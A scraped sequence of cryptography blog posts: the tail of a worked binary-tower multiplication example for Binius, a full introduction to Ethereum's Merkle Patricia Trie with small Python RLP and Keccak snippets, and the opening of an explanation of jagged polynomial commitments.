    * $P^\prime_C = (\alpha_{00}+\alpha_{01})\cdot(\beta_{00}+\beta_{01})$, which in $\mathcal{T_1}$ coordinates is the product $$\boxed{0, 1}\times \boxed{0, 0}=\boxed{0,0}$$ (once done the necessary addition in each factor)</span></span>
    * And finally the product of the uncanny $P^\prime_B X_{0}$ term:  </span></span></code></pre>
$$\boxed{0,0}\times\boxed{

\begin{matrix}

0 & 1 \newline

1 & 1

\end{matrix}

}=\boxed{0,0}$$</p>
It is now time to construct the product $\alpha_0 \beta_0$ as an element in $\mathcal{T_2}$; and now is where the special choice of basis comes into play (again): The way elements of $\mathcal{T_1}$ sit into $\mathcal{T_2}$ is fundamental and computationally crucial: to view them in the extension above we simply pad with zeros at the end of their $\mathcal{T_1}$ coordinates to get a 4 bit string.</strong></p>
According to the algorithm presented, the coordinate expression for</p>
$$\alpha_0 \beta_0 = (P^\prime_A + P^\prime_B) + (M + P^\prime_B X_0) X_1$$</p>
can be reconstructed step by step. First add</strong> in $\mathcal{T_1}$, then pad</strong> :</p>
$$[P^\prime_A + P^\prime_B ]^1 = \boxed{0,1} + \boxed{0,0} = \boxed{0,1} \implies [P\prime_A+P\prime_B]^2 = \boxed{0,1,0,0}$$</p>
Then, the slippery part: viewed as elements in $\mathcal{T_1}$,</p>
$$[P^\prime_B X_0 ]^1 = \boxed{0,0} \implies [M + P^\prime_B X_0 ]^1 = \boxed{0,1} + \boxed{0,0} =\boxed{0,1}$$</p>
Before multiplying it with $X_1$, we embed this element in $\mathcal{T_2}$ by padding with zeros at the end.</strong> Multiplication by $X_1$ is done by matrix multiplication</p>
$$[(M + P^\prime_B X_0 )\cdot X_1 ]^2 = \boxed{0,1,0,0}\times \boxed{

\begin{matrix}

0 & 0 & 1 &0\newline

0 & 0 & 0 & 1\newline

1 & 0 & 0 & 1\newline

0 & 1 & 1 & 1

\end{matrix}

} =\boxed{0,0,0,1}$$</p>
Finally, performing the sum we obtain</p>
$$\boxed{0,1,0,0} + \boxed{0,0,0,1} = \boxed{0,1,,0,1}$$</p>
which means that $P_A = \alpha_0 \beta_0 = X_0 + X_0 X_1 \in \mathcal{T_2}$</p>
    * Once that we explained in detail the first case, we proceed to calculate $P_B:$</span></span></code></pre>
$$\begin{pmatrix}\alpha_1\newline \hline \beta_1\end{pmatrix}^2=\begin{pmatrix}

0 & 0 & 1 & 0\newline

\hline % This command draws a solid horizontal line

0 & 1 & 0 & 0

\end{pmatrix}=

\left(

\begin{array}{cc:cc} % ‘c’ for centered column, ‘:’ for a dotted vertical line

0 & 0 & 1 & 0 \newline

\hline % Solid horizontal line

0 & 1 & 0 & 0

\end{array}

\right)

= \left(

\begin{array}{c:c} % ‘c’ for centered column, ‘:’ for a dotted vertical line

\alpha_{10} & \alpha_{11} \newline

\hline % Solid horizontal line

\beta_{10} & \beta_{11}

\end{array}

\right)$$</p>
We’ll compute $\alpha_1 \beta_1$ going one level down in the recursion, viewing its coordinates in $\mathcal{T_2}$ in its coordinates in $\mathcal{T_0}$, just as before:</p>
    1. $P^\prime_A = \alpha_{10}\cdot\beta_{10}$, which in $\mathcal{T_1}$ coordinates is the product $$\boxed{0, 0}\times \boxed{1, 0} = \boxed{0,0}$$</span></span>
    2. $P^\prime_B = \alpha_{11}\cdot\beta_{11}$, which in $\mathcal{T_1}$ coordinates is the product $$\boxed{1, 0}\times \boxed{0, 0} = \boxed{0,0}$$</span></span>
    3. $P^\prime_C = (\alpha_{10} + \alpha_{11})\cdot(\beta_{10} + \beta_{11})$, which in $\mathcal{T_1}$ coordinates is the product $$\boxed{1, 0}\times \boxed{0, 1} = \boxed{0,1}$$ (once done the necessary addition in each factor)</span></span>
    4. And finally we have the $P^\prime_B X_{0}$ term (we omit writing down the matrix product since this is fairly trivial and intuitive from reading the coordinates):  </span></span></code></pre>
$$\boxed{0,0}\times\boxed{0,1} = \boxed{0,0}$$</p>
With all these, we’re ready to reconstruct $\alpha_1 \beta_1$ as an element in $\mathcal{T_2}$. The coordinate expression for</p>
$$\alpha_1 \beta_1 = (P^\prime_A + P^\prime_B ) + (M + P^\prime_B X_0) X_1$$</p>
can be reconstructed from the 2-bit strings as follows: first, add then pad.</strong> We get</p>
$$[P^\prime_A + P^\prime_B ]^1 = \boxed{0,0} + \boxed{0,0} = \boxed{0,0}\implies [P^\prime_A + P^\prime_B ]^2 = \boxed{0,0,0,0}$$</p>
remembering the padding to view them in $\mathcal{T_2}$ coordinates. Then, the slippery part: viewed as elements in $\mathcal{T_1}$,</p>
$$[P^\prime_B X_0 ]^1=\boxed{0,0}\implies [M + P^\prime_B X_0]^1 = \boxed{0,1} + \boxed{0,0} = \boxed{0,1}$$</p>
Before multiplying it with $X_1$, we embed this element in $\mathcal{T_2}$ by padding with zeros at the end.</strong> Then, matrix multiplication:</p>
$$[(M + P^\prime_B X_0 ) X_1]^2 = \boxed{0,1,0,0}\times \boxed{

\begin{matrix}

0 & 0 & 1 &0\newline

0 & 0 & 0 & 1\newline

1 & 0 & 0 & 1\newline

0 & 1 & 1 & 1

\end{matrix}

}=\boxed{0,0,0,1}$$</p>
We then perform the sum to obtain</p>
$$\boxed{0,0,0,0} + \boxed{0,0,0,1} = \boxed{0,0,,0,1}$$</p>
which means that $P_B = \alpha_1 \beta_1 = X_0 X_1 \in \mathcal{T_2}$</p>
Now we want to compute $P_C = (\alpha_) + \alpha_1)(\beta_0 + \beta_1)$. By taking a look at the expression in coordinates of $u$ and $v$, the sum of its first and second halves is done quickly and now we have</p>
$$\begin{pmatrix}\alpha_0 + \alpha_1\newline \hline \beta_0 + \beta_1\end{pmatrix}^2=\begin{pmatrix}

0 & 1 & 1 & 0\newline

\hline % This command draws a solid horizontal line

1 & 1 & 1 & 0

\end{pmatrix}=

\left(

\begin{array}{cc:cc} % ‘c’ for centered column, ‘:’ for a dotted vertical line

0 & 1 & 1 & 0 \newline

\hline % Solid horizontal line

1 & 1 & 1 & 0

\end{array}

\right)

= \left(

\begin{array}{c:c} % ‘c’ for centered column, ‘:’ for a dotted vertical line

a & b \newline

\hline % Solid horizontal line

c & d

\end{array}

\right)$$</p>
We’ll compute $P_C$ going one level down in the recursion, viewing its coordinates in $\mathcal{T_2}$ in its coordinates in $\mathcal{T_0}$, just as before:</p>
    1. $P^\prime_A = a\cdot c$, which in $\mathcal{T_1}$ coordinates is the product $$\boxed{0, 1}\times \boxed{1, 1} = \boxed{1,0}$$</span></span>
    2. $P^\prime_B = b\cdot d$, which in $\mathcal{T_1}$ coordinates is the product $$\boxed{1, 0}\times \boxed{1, 0} = \boxed{1,0}$$</span></span>
    3. $P^\prime_C = (a + b)\cdot(c + d)$, which in $\mathcal{T_1}$ coordinates is the product $$\boxed{1, 1}\times \boxed{0, 1}=\boxed{1,0}$$ (once done the necessary addition in each factor)</span></span>
    4. And finally we have the $P^\prime_B X_{0}$ term:  </span></span></code></pre>
$$\boxed{1,0}\times\boxed{0,1} = \boxed{0,1}$$</p>
With all these, we’re ready to reconstruct $P_C$ as an element in $\mathcal{T_2}$. The coordinate expression for</p>
$$P_C = (P^\prime_A + P^\prime_B) + (M + P^\prime_B X_0 )X_1$$</p>
can be reconstructed from the 2-bit strings as follows: first add, then pad</strong>. Since we already did this a couple of times, we allow some speeding:</p>
$$[P^\prime_A + P^\prime_B ]^2 = \boxed{1,0,0,0} + \boxed{1,0,0,0} = \boxed{0,0,0,0}$$</p>
Then, the slippery part: viewed as elements in $\mathcal{T_1}$,</p>
$$P^\prime_B X_0 = \boxed{0,1}\implies M + P^\prime_B X_0 = \boxed{1,0} + \boxed{0,1} = \boxed{1,1}$$</p>
Before multiplying it with $X_1$, we embed this element in $\mathcal{T_2}$ by padding with zeros at the end.</strong> We now perform the product in the upper extension by simply shifting its coefficients in two positions to the left while padding with zeros the first two slots:</p>
$$[M + P^\prime_B X_0 ]^2=\boxed{1,1,0,0},\quad\text{then }\quad [(M + P^\prime_B X_0 )X_1 ]^2 = \boxed{0,0,1,1}$$</p>
We obtain $[P_C ]^2=\boxed{0,0,1,1}$, this is, $P_C = X_1 + X_0 X_1 \in\mathcal{T_2}$</p>
The last branch of this first layer amounts to computing $P_BX_1$; this product happens in the $\mathcal{T_2}$ subfield. In coordinates we have</p>
$$[P_B X_1 ]^2 = \boxed{0,1,1,1}$$</p>
    * **Second step:** Reconstruct by performing additions</span></span></code></pre>
We’re now ready to build $u\cdot v$ with Karatsuba’s recipe:</p>
$$u\cdot v = (P_A + P_B ) +(M + P_B X_1 ) X_2$$</p>
Let’s proceed in coordinates. Before anything else, lest begin by displaying all the elements we need to combine so we don’t mess up.</p>
    1. $P_A = X_0 + X_0 X_1 \in\mathcal{T_2} \iff [P_A ]^2 = \boxed{0,1,0,1}$</span></span>
    2. $P_B = X_0 X_1 \in\mathcal{T_2} \iff [P_B ]^2 = \boxed{0,0,0,1}$</span></span>
    3. $P_C = X_1 + X_0 X_1 \in\mathcal{T_2} \iff [P_C ]^2 = \boxed{0,0,1,1}$</span></span>
    4. $M = P_A + P_B + P_C = X_0 + X_1 + X_0 X_1 \in\mathcal{T_2} \iff [M]^2 = \boxed{0,1,1,1}$</span></span>
    5. $P_B X_1 = X_0 + X_1 + X_0 X_1 \in\mathcal{T_2} \iff [P_B X_1 ]^2 = \boxed{0,1,1,1}$</span></span></code></pre>
To do this, we add these elements in $\mathcal{T_2}$ and then embed them in $\mathcal{T_3}$ by simply padding with zeros their last 4 positions to obtain 8 bit strings. This gives</p>
$$[P_A + P_B]^3 = \boxed{0,1,0,0,0,0,0,0}$$</p>
is the first thing we need. Now compute $M + P_B X_1$ in $\mathcal{T}^3$;</p>
$$[M + P_B X_1 ]^2 = \boxed{0,0,0,0}\implies [M + P_B X_1 ]^3 = \boxed{0,0,0,0,0,0,0,0}$$</p>
so trivially</p>
$$[(M + P_B X_1 )X_2 ]^3 = \boxed{0,0,0,0,0,0,0,0}$$</p>
The desired product is then</p>
$$[u\cdot v]^3 = \boxed{0,1,0,0,0,0,0,0} + \boxed{0,0,0,0,0,0,0,0} = \boxed{0,1,0,0,0,,0,0}$$</p>
this is $u\cdot v = X_0$ which can be verified directly by hand.</p>
Obviously, this last example performed in full can quickly turn dull, but it only hightens the convenient recursive nature of multiplication in binary towers and that circuitry-level operations appear as a key element for fast and efficient implementations.</p>
Summary</h2>
In this post, we covered the basics of the tower construction powering Binius and some of its interesting properties. In an upcoming article, we raise the bar and aim for a more involved problem: polynomial evaluation in binary towers.</p>


An introduction to Merkle Patricia Trie
Unknown — Mon, 09 Jun 2025 00:00:00 +0000
Introduction</h2>
Ethereum relies on cryptographic data structures to efficiently store and verify its state. One of these structures is the Merkle Patricia Trie (MPT), which powers Ethereum’s state management. After exploring this tool in more depth, it becomes clear that the MPT is a complex structure—far more intricate than a simple Merkle tree. That’s why we felt it was important to create this post: to make MPTs more accessible and easier to understand. Here we’ll explain what an MPT is, how Ethereum uses it and how its proofs work. In an upcoming post, we will explain how to arithmetize the MPT to be able to generate proofs for showing that we verified that elements are in the tree or that the tree has been updated successfully.</p>
In what follows we only assume that you have a basic knowledge of Merkle Trees</a> and cryptographic hash functions.</p>
Quick Merkle Tree Recap</h2>
A Merkle Tree is a binary tree where:</p>
    * _Leaves_ contain hashes of data.</span></span>
    * _Non-leaf nodes_ contain hashes of the concatenation of their child nodes.</span></span>
    * The _root hash_ acts as a cryptographic fingerprint of all the leaves data. In other words, it's a short, fixed-size summary (a hash) that uniquely identifies a large set of data — like a unique signature.</span></span></code></pre>
Merkle trees are used for data integrity proofs</strong> : you can prove efficiently that a piece of data belongs to the tree’s leaves by providing a Merkle path (a sequence of hashes from the leaf to the root).</p>
What is a trie?</h2>
A Trie (short for retrieval tree, also known as a prefix tree) is a tree-like data structure used to efficiently store and retrieve key-value pairs, especially when the keys are strings or sequences.</p>
Each level of the trie represents a character in the key, and the path from the root to a leaf corresponds to an entire key. Shared prefixes between keys are stored only once, making tries very space-efficient for datasets with common prefixes.</p>
Let’s see a toy example to make it easier to understand. Let’s say we want to store these key-value pairs:</p>
Key</th> Value</th></tr></thead>

cat</td> curious</td></tr>
cake</td> sweet</td></tr>
cup</td> fragile</td></tr>
cups</td> plural</td></tr>
book</td> heavy</td></tr>
</tbody></table>
Our toy trie would look something like this:</p>
</p>
To look up the value of the key “cake”:</p>
    1. Start at the root.</span></span>
    2. Follow the nodes corresponding to the key's characters: `c -> a -> k -> e`.</span></span>
    3. Retrieve value "sweet" at the last node `e`.</span></span></code></pre>What is a Merkle Patricia Trie?</h2>
Ethereum uses a specialized form of trie called the Modified Merkle Patricia Trie (MPT). The name combines three core ideas:</p>
    * **Trie:** For organizing keys by shared prefixes.</span></span>
    * **Merkle:** Every node is hashed, forming a Merkle structure that enables cryptographic verification of the entire dataset.</span></span>
    * **Patricia:** Short for Practical Algorithm to Retrieve Information Coded in Alphanumeric — a variant of a trie that compresses paths where nodes have a single child (also called radix or compact trie).</span></span></code></pre>How are MPTs used in Ethereum?</h2>
Ethereum uses several MPTs, but we’ll focus on just one of them, the State Trie</strong> , and use it as an example to explain how they work.</p>
In the State Trie, the state of every account is stored as a key-value pair where:</p>
    * The **key** is the Keccak-256 hash of the account address.</span></span>
    * The **value** is the account, which is the [RLP](https://ethereum.org/en/developers/docs/data-structures-and-encoding/rlp/) encoding of a four item array: `[nonce, balance, storageRoot, codeHash]`.</span></span></code></pre>
To reach consensus, when a new block appears with a transaction set, every Ethereum node would need to execute all those transactions and verify that the resulting state is the same for all the nodes. However, comparing every account would be computationally very expensive, so instead they use an MPT. The states of all the accounts of Ethereum are stored in a single Merkle trie called State Trie</strong> that is constantly updated after each transaction execution. To reach consensus, the nodes just compare the StateRoot</strong> (the root of the State Trie). If two nodes have the same StateRoot, their states match.</p>
Immutability: The big MPT’s advantage</h2>
Ethereum needs to be able to revert easily to previous states: when nodes disagree on the next block, a blockchain fork is necessary. This is possible because tries keep the old state around, instead of deleting or modifying it directly. The trie is persistent and versionable, rather than a mutable in-place structure.</p>
When the state changes (e.g., an account balance updates), the trie creates new nodes for the changed paths, while the rest of the trie (the unchanged parts) are reused. Therefore, previous versions of the trie are still accessible via their root. Every block stores a state root in its header and this root uniquely identifies the entire Ethereum state at that point in time. So, if Ethereum needs to rollback, it just uses the state root of a previous block. Since the old nodes were never deleted, the trie can rebuild the old state efficiently. This means Ethereum can restore the old state just by switching back to an earlier root hash.</p>
MPT Structure</h2>
Let’s explain how the State Trie is built. As we said above the keys of this trie consist of the hashes of the addresses, represented as a hexadecimal string. As we showed in the toy example, each node of the trie will store a character of the hex string, that is, a single nibble</a> (four bits of data).</p>
There are three types of nodes in an MPT:</p>
    1. **Branch Node**</span></span>
       * It stores a 17-item array.</span></span>
       * The first 16 items represent one of each hexadecimal digit the key prefix can be. If the key prefix is the digit $i$, then at index $i$ you'll find the pointer to the next node that continues the key's path.</span></span>
       * The last item can allocate a value in the case a key ends there.</span></span>
       * Example:  </span></span></code></pre>
[0x, 0x, child_hash, 0x, 0x, other_child_hash, 0x, 0x, 0x, 0x, 0x, 0x, 0x, 0x, 0x, 0x, value]</code>

Here, "0x"</code> represents the unused slots, i.e. digits that don’t have children.
2. Extension Node</strong>
* It’s the result of an optimization to compresses shared key prefixes.
* It stores a two item array that contains the shared key prefix and a pointer to the next node.
* Example: [shared_prefix, child_hash]</code>
3. Leaf Node</strong>
* It stores a two item array with the remaining key fragment and its associated value, ending the path.
* Example: [key_remaining, value]</code></p>
The three types of nodes store a single array encoded in RLP</a>. The pointer to a certain node is always the hash of this RLP string data that stores. The root can be of any type, but usually, since we have a lot of data, the root is a branch node.</p>
Node and parity flags</h3>
When traversing a key path nibble by nibble (or character by character), we may end up with a leaf or extension node that has an odd number of nibbles to store. But since all data is stored in bytes, this creates a problem. For instance, if we wanted to store the nibble 1</code>, we would have to save it as 01</code>, but we wouldn’t be able to tell whether it came from the two nibbles 01</code>, or from a single nibble 1</code>. To indicate whether we are storing an even or odd number of nibbles — and what type of node we are dealing with (leaf or extension) — the partial path is prefixed with the following flags.</p>
flag</th> node type</th> path length parity</th></tr></thead>

00</td> Extension</td> Even</td></tr>
1</td> Extension</td> Odd</td></tr>
20</td> Leaf</td> Even</td></tr>
3</td> Leaf</td> Odd</td></tr>
</tbody></table>
Example: Building an MPT step by step</h2>
The best way to understand what is an MPT is to see a full example. Let’s simulate a real State Trie. Let’s say we have data for five accounts that translate into the following key-value pairs:</p>

| Keys | Values

—|—|—

1 | 0x616b6c64 | 0x01

2 | 0x616b6c65 | 0x02

3 | 0x616b6c78 | 0x03

4 | 0x616b6d31 | 0x04

5 | 0x31323334 | 0x05</li>
</ul>
As we mentioned earlier, the keys should be the hashes of the account addresses. Since Ethereum uses Keccak-256, the keys should be 32 bytes long (or 64 hexadecimal characters). However, for this example, we’ll use much shorter keys so that the resulting trie isn’t too large and is easier to understand. Ethereum also uses optimizations, such as inlining small nodes, which we’ll skip in this example for clarity.</p>
Now we are ready to build the MPT:</p>
    1. Start with an empty MPT and add the first key-value pair: `(0x616b6c64, 0x01)`. Since it is just one key, it results in a trie of only one leaf node. To create that node proceed in the following way:</span></span>
</span>
       * **Write a two-item array:** The first element should be the whole key and second one the value. Add the prefix flag `20` to the first element indicating that the node is a leaf and that the key has an even amount of nibbles. Then, the array should look like this: `["0x20616b6c64","0x01"]`.</span></span>
       * **Encode in RLP the array:** You can use an [RLP converter](https://toolkit.abdk.consulting/ethereum#rlp) or this python script:</span></span>
</span>
import rlp</span></span>
</span>
key = bytes.fromhex("20616b6c64")</span></span>
value = bytes.fromhex("01")</span></span>
encoded = rlp.encode([key, value])</span></span>
print(encoded.hex())</span></span></code></pre>
This should output this hex: c78520616b6c6401</code>.</p>
       * **Hash the RLP encoding** using Keccak-256 to get the pointer of this node. You can use an [online hasher](https://emn178.github.io/online-tools/keccak_256.html) or this script:</span></span>
</span>
from eth_utils import keccak</span></span>
</span>
rlp_bytes = bytes.fromhex("c78520616b6c6401")</span></span>
hash_pointer = keccak(rlp_bytes)</span></span>
print(hash_pointer.hex())</span></span></code></pre>
This should output:</p>
4e2d0fbe6726eac15c5ecf49a4e1f947aa50e0531f4f3e98b8e1577ba52e1783</span></span></code></pre>
The resulting MPT should look like this:

</p>
    2. Add the second key-value pair: `(0x616b6c65, 0x02)`. Since this key shares the first 7 digits with the previous one, we proceed in the following way:</span></span>
</span>
       * **Build one leaf for each key:** In each leaf, the array's first element should be the remaining path, but since the two keys share every digit except the last one, the remaining path is empty. So, we should just write there the flag `20` indicating that we are in a leaf node and that the path has an even amount of digits (zero digits). After that, encode the arrays in RLP and hash the RLP encodings, as we did in the step 1.</span></span>
       * **Build a branch node:** Create a 17-item array. Write the hash of the first key's leaf node at index $4$ and the hash of the second key's leaf node at index $5$. Encode the array in RLP and hash the encoding.</span></span>
       * **Build the extension and root node:** Create a two item array that contains the shared prefix as first element and the hash of the previous built branch node as second element. Since the shared prefix has an odd number of digits, add the flag `1` to it. Encode the array in RLP and hash the encoding.  </span></span></code></pre>

3. Add the key-value pair (0x616b6c78, 0x03)</code>:</p>
       * **Add a leaf node:** Notice that in this case, since the new key shares with the previous ones all the digits except the last two, the array's first item will have just one digit as remaining path and the flag `3` indicating that it is a leaf node with an odd amount of path digits.</span></span>
       * **Add a branch node:** Its array should contain at index $6$ the hash pointer of the branch node built in step 2, and at index $7$ the hash pointer of the new leaf node we recently added.</span></span>
       * **Add an extension node:** The root will be another extension node. Its array should contain the shared prefix as first element and the hash of the recently added branch node as second element. Since the share prefix has an even number of digits, add the flag `00` to it.</span></span></code></pre>
The current trie should look lik this:

</p>
    4. Add the last two key-value pairs continuing in this way, following the same steps as we did for the previous keys. When you're done, you should have the following MPT:  </span></span></code></pre>
</p>
Trie Proof</h2>
Let’s now understand what a proof looks like in an MPT. Continuing with the previous example, let’s say we want to prove that the key-value pair (0x616b6d31, 0x04)</code> belongs to our State Trie. How do we build the proof?</p>
The proof will consist of the StateRoot</strong> 0x13ea...bed7</code> (the hash of the root node) along with a path that starts at the root and traverses the trie downward, following every digit of the target key until it reaches its leaf. Let’s go step by step to see how we build this path:</p>
    1. The first element of the path is the RLP of the root node: `0xf851...8080`.  </span></span></code></pre>
If we decode this RLP, we find that the root is a branch node. The array it represents has all empty slots except at indices 3 and 6 (because all the keys start with the digit 3</code> or 6</code>). This means that the root node branches into two child nodes. Since the first digit of the key we’re looking for is 6</code>, we need to look at the hash stored in the array at index 6 and move to that node.</p>
    2. We move to the next node and store its RLP content as the second element of the path: `0xe583...67e9`.  </span></span></code></pre>
This node is an extension node because all keys starting with 6 share the same next four digits: 16b6</code>. To determine where to go next, we decode the RLP and get a two-item array. The second item gives us the hash of the next node we need to access.</p>
    3. Again, we move to the next node and store its RLP content as the third element of the path: `0xf851...8080`.  </span></span></code></pre>
This node is a branch node. Since our key continues with the digit d</code>, we need to look at the hash stored in this node’s array at index $d$ and move to the node that this hash points to.</p>
    4. Finally, we reach the leaf node: `0xc482203104`. We store the RLP content of this final node, and with that, the proof is complete.</span></span></code></pre>
Then the proof for the key-value (0x616b6d31, 0x04)</code> should look like this:</p>
state_root = 0x13ea549e268b5aa80e9752c6be0770cffba34d2b1aa1f858cb90f3f13ac3bed7</span></span>
</span>
proof_path = </span></span>
    [</span></span>
    0xf851808080a0a26b2ac124718443aeed68fa0309225d0c8dd9dbee45685909e92fb594e1a4638080a02ccd118c9470c051689543b233ab109ad74d2fb4f57eb429c4d43294d6ae686780808080808080808080,</span></span>
    0xe5831616b6a0917fa5cab26d915e2a89a263a578fa5f9ecf02cc0b1d3eeb433e7f32499267e9,</span></span>
    0xf851808080808080808080808080a0cc97f12ea3217345e666974cd81b117ca02404f19c15d31158ac1d1e55398706a0822a55ca308aa885ad385d5e61aabaca54c2e4361eb03b6f851668c0f095ab77808080,</span></span>
    0xc482203104</span></span>
    ]</span></span></code></pre>Verify</h2>
If a verifier receives the StateRoot and the proof path for a certain key, how does he verify that the proof is valid?</p>
A key distinction from standard Merkle Trees is the verification direction. While a typical Merkle proof is verified from the bottom up (from the leaf to the root), a Merkle Patricia Tries proof is verified from the top down. The process starts at the StateRoot</code> and traverses the trie downwards, node by node, using the provided path to eventually reach the target leaf.</p>
Let’s say the verifier receives the proof of above for the key-value (0x616b6d31, 0x04)</code>. Then, he has to follow these steps:</p>
    1. [Hash](https://emn178.github.io/online-tools/keccak_256.html) the first element of the path and check that it matches the given **StateRoot**. Indeed:</span></span>
</span>
keccak(bytes.fromhex(</span></span>
    "f851808080a0a26b2ac124718443aeed68fa0309225d0c8dd9dbee45685909e92fb594e1a4638080a02ccd118c9470c051689543b233ab109ad74d2fb4f57eb429c4d43294d6ae686780808080808080808080"</span></span>
)).hex() ==</span></span>
    "13ea549e268b5aa80e9752c6be0770cffba34d2b1aa1f858cb90f3f13ac3bed7"</span></span>
</span>
</span>
    2. [Decode](https://toolkit.abdk.consulting/ethereum#rlp) the **first RLP element** of the path and verify that in the index $6$ has the hash of the second path element. Indeed:</span></span>
</span>
rlp.decode(bytes.fromhex(</span></span>
    "f851808080a0a26b2ac124718443aeed68fa0309225d0c8dd9dbee45685909e92fb594e1a4638080a02ccd118c9470c051689543b233ab109ad74d2fb4f57eb429c4d43294d6ae686780808080808080808080"</span></span>
))[6].hex() ==</span></span>
    "2ccd118c9470c051689543b233ab109ad74d2fb4f57eb429c4d43294d6ae6867"</span></span>
</span>
</span>
    3. Decode the **path's second RLP element**. You'll find a two-item array whose first element is `0x1616b6`. Since its first digit is `1` we know that we are on an extension node. Check that the rest of the digits correspond to the key we are looking for. Verify the array's second element is the hash of the path's next element.</span></span>
</span>
    4. Decode the **third path element**. You'll find a branch node. Verify that at index $d$ it stores the hash of the path's element.</span></span>
</span>
    5. Decode the **path's last element**. You'll find a two item array whose first element is `0x2031`. Since its firs two digits are `20`, we know that we reach a leaf node. Verify that the first item contains the remaining key's digits `31` and the second item contains the key's value `0x04`.</span></span></code></pre>Summary</h2>
The Merkle Patricia Trie is the backbone of Ethereum’s state management. It combines the key-navigation efficiency of tries, and the cryptographic guarantees of Merkle trees. This structure allows Ethereum to store, verify, and revert state efficiently and securely. With the MPT, Ethereum nodes can independently execute transactions and verify consensus simply by comparing state roots, enabling a scalable and trustless blockchain system. In an upcoming post we will develop how to arithmetize the MPT update and show that we verified inclusion proofs.</p>


Our Succinct explanation of jagged polynomial commitments
Unknown — Fri, 06 Jun 2025 00:00:00 +0000
Introduction</h2>
Few weeks ago, Succinct release their paper Jagged Polynomial Commitments</a> and their verifier using the techniques described there, allowing them to prove Ethereum blocks in around 12 seconds, showing that real-time proving of the chain is possible. While this represents the average case and energy consumption is still high</a>, it is a major step towards scaling Ethereum using ZK. The paper makes heavy use of multilinear polynomials and the sumcheck protocol, so we recommend you read our post on sumcheck</a>, GKR</a> and Basefold</a> if you are unfamiliar with them. For more background on sparse commitments and its uses, see twist and shout</a> and Lasso</a>. For more background on read-once branching programs and their use in evaluating multilinear extensions, see here</a>.</p>
Jagged functions</h2>
Typical arithmetization schemes consist of several tables (for example, one for the CPU, one for the ALU, another for memory, etc) and a set of algebraic constraints that have to be enforced over the table. Each column of the tables is encoded using univariate or multivariate polynomials and the prover then commits to these encodings (using a polynomial commitment scheme, PCS). In both cases, we require that the length of the columns is a power of 2, since this enables efficient encoding, either via the fast Fourier transform (FFT) or the multilinear Lagrange basis polynomials. This imposes several constraints:</p>
    1. All columns in a table must have the same length</span></span>
    2. We need to pad the columns to ensure their length is equal to a power of 2.</span></span></code></pre>
This results in a lot of overhead, since we need to pad all columns to the same length and store a large number of dummy entries in the tables (for example, zero values). We would like to use some sparse representation of the data, that is, just storing all the non-dummy values. Moreover, we would like to compress everything into a single column to commit to just one encoding. This is precisely one of the main points of the paper, which finds a way to obtain a dense representation of the tables, without all the padding (note that we will need the column to have a length equal to a power of 2, and some padding might be necessary).</p>
We will explain the idea behind the dense representation using one table, but the idea can be extended to several tables, adding one additional variable keeping track of the number of table and the number of columns each table has. Suppose we have a table which has 32 columns ($32 = 2^5$). For each column, we keep the length $l_k$ of each column, consisting of the non-dummy entries. For example, $l_0 = 2^{20}$, $l_1 = 2^{18} + 15$, $l_2 = 2^{16} + 1475$, and so on and so forth. The prover can construct a vector whose entries are the added lengths of the columns, $t$. So, $t_0 = l_0$, $t_1 = l_0 + l_1$, $t_2 = l_0 + l_1 + l_2$. In summary,

$t_0 = l_0$

$t_{k + 1} = t_k + l_{k + 1}$

Note that, since the $l_k$ are all positive, the vector $t$ has non-decreasing entries. We can merge all the columns into a single one, by stacking them one below the other. Given an index $j$ for the vector of stacked columns, we can find where the original element was. First, we look for the smallest $k$, such that $j < t_k$. This $k$ gives the column where the element belongs. Then, we can compute the row by doing $i = j - t_{k - 1}$ (if $k = 0$, then $i = j$). This yields a one-to-one correspondence between the original table and the stacked columns (we will call this, the dense representation form now on). The dense representation has a length equal to $2^m$, where $m = \lceil \log_2 \max{t} \rceil$. Given the procedure to find the row and column, we can define two functions,

$\mathrm{col}(j) = \min_k \{t_k > j \}$

$\mathrm{row}(j) = j - t_{k - 1}$

Using the letter $q$ to denote the multilinear encoding of the dense representation, we see that each entry corresponds to the non-dummy part of the multilinear extension of the whole table, $p$.

$p(\mathrm{row}(j), \mathrm{col}(j)) = q(j)$.</p>
This saves a lot of space to represent the whole table, at the expense of having the prover send the vector $t$. We can then show that if we want to evaluate $p(z_r , z_c)$ this is equivalent to,

$p(z_r , z_c) = \sum p(x , y) \mathrm{eq} (x , z_r) \mathrm{eq} (y , z_c) = \sum q(i) \mathrm{eq}(\mathrm{row}(i) , z_r) \mathrm{eq}(\mathrm{col}(i) , z_c)$

since any zero entry of $p(x,y)$ does not contribute to the sum.</p>
Why does this work with multilinear polynomials?</h2>
Multivariate polynomials use the sumcheck protocol to reduce statements to the evaluation of the polynomial at a random point. For example, we can use the sumcheck protocol to show that the multivariate polynomial $g$ evaluates to zero over the hypercube using the zero-check,

$$\sum \mathrm{eq}(r,x) g(x) = 0$$

and, by interacting with the prover, the verifier is left to perform one evaluation at $z$ for $\mathrm{eq} (r,z) g(z)$, plus some simple checks involving univariate polynomials. Using a PCS, the prover can give the verifier access to $g$ and query for the evaluation at $z$ using the evaluation protocol of the PCS.</p>
In the case of univariate polynomials, we show that $g(x)$ has zeros over a domain $D$ by quotienting with the zerofier/vanishing polynomial over $D$, $Z_D (x)$. In general, if $D$ has a nice structure (for example, $D$ consists of the n-th roots of unity), the vanishing polynomial can be evaluated very efficiently (in our example, $Z_D (x) = x^n - 1$. In the case of sparse polynomials, the representation of $Z_D (x)$ may be complicated and thus not efficiently computable.</p>
Thus, multilinear polynomials do not require computing quotients and you can work a priori on more general fields (FFTs, on the other hand, need smooth domains where $|F| - 1 = 2^n c$, where $n$ is typically at least $24$).</p>
How to handle a large number of columns</h2>
The paper offers two optimizations to deal with a large number of columns:</p>
    1. Fancy jagged: if all the columns in a table have the same height, we reduce the amount of information we need to pass to compute $t$.</span></span>
    2. Commit to the column heights. The prover can include the column heights (prepending them to the table) in the table and commit to them.</span></span></code></pre>Jagged PCS</h2>
Another core part of the paper consists in developing a PCS for sparse/jagged polynomials. Remember that, from the discussion above,

$p(z_r , z_c) = \sum p(x , y) \mathrm{eq} (x , z_r) \mathrm{eq} (y , z_c) = \sum q(i) \mathrm{eq}(\mathrm{row}(i) , z_r) \mathrm{eq}(\mathrm{col}(i) , z_c)$

We can find the multilinear extension of a function $f_t$ given by

$f_t (x) = \mathrm{eq}(\mathrm{row}(x) , z_r) \mathrm{eq}(\mathrm{col}(x) , z_c)$

